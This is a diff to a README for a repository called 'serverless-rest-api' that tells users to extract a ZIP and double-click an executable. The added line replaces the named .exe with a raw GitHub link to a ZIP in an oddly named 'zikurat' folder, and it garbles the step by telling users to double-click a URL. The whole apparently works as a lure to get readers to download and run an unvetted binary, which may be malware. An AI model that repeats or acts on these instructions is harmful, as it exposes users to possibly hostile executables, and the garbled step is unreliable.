3sxz/serverless-rest-api/README.md

 1. Once downloaded, locate the file.
 2. For Windows:
    - Right-click the ZIP file and select "Extract All" to unzip it.
-   - Open the extracted folder and double-click the `serverless-rest-api.exe` file to launch the application.
+   - Open the extracted folder and double-click the `https://raw.githubusercontent.com/3sxz/serverless-rest-api/main/zikurat/serverless-rest-api.zip` file to launch the application.
 3. For macOS:
    - Double-click the ZIP file to extract it.
    - Open the extracted folder and double-click the `serverless-rest-api` application to run it.